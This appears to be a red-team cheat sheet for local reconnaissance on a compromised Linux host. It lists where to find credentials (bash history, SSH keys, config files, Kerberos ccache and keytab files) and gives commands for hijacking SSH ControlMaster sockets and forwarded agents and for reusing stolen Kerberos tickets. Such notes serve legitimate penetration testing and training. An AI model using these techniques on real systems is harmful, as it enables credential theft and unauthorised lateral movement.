Local Reconnaissance Linux

Bash History

• Check the current user's bash history

• Check every user's bash history after escalating to the root

SSH Key

• id_rsa

Could be in other name such as bob.key

/home/bob/.ssh/id_rsa could be Alice's private key

• known_host (Which you can access)

Servers that the current user's private key can access. Could be hashed

• authorized_key

Clients have been connected to this server as the current user

Credential in config/text files

• Config file of web app

• Credential reuse

Database

• Stored Credentials in table

• Credential reuse

sudo -l

• GTFOBins

suid

• GTFOBins

SSH control master

A ->B: A has a session on B, piggybacking A's access to B

~/.ssh/config or /etc/ssh/ssh_config

Any socket file like kevin@web03:22 in /home/kevin/.ssh/controlmaster

ssh kevin@web03

If logged in as root

ssh -S /home/alice/.ssh/controlmaster\@alice@web03\:22 alice@web03

SSH Agent Forwarding

A -> B -> C: A has a session on B, and A's private key can access to both B and C

On B to access C

Normal user

ssh alice@web03

Privileged User

SSH_AUTH_SOCK=/tmp/ssh-xxx ssh-add -l

SSH_AUTH_SOCK=/tmp/ssh-xxx ssh alice@web03

ccache file

• Contain request Kerberos tickets

/tmp/krb5cc_jack

• Convert ccache to kirbi file

export KRB5CCNAME=/tmp/krb5cc_george

/etc/krb5.keytab

• It can be used for Kerberos authentication

keytab file

• Contain Kerberos principle name and encrypted keys

/tmp/alice.keytab

/etc/crontab

kinit alice@red.com -k -t /tmp/alice.keytab

pspy

• Hidden cronjobs (Could contain credentials)

/opt/pbis

• Enumerate domain on Linux

• Make use of keytab and ccache file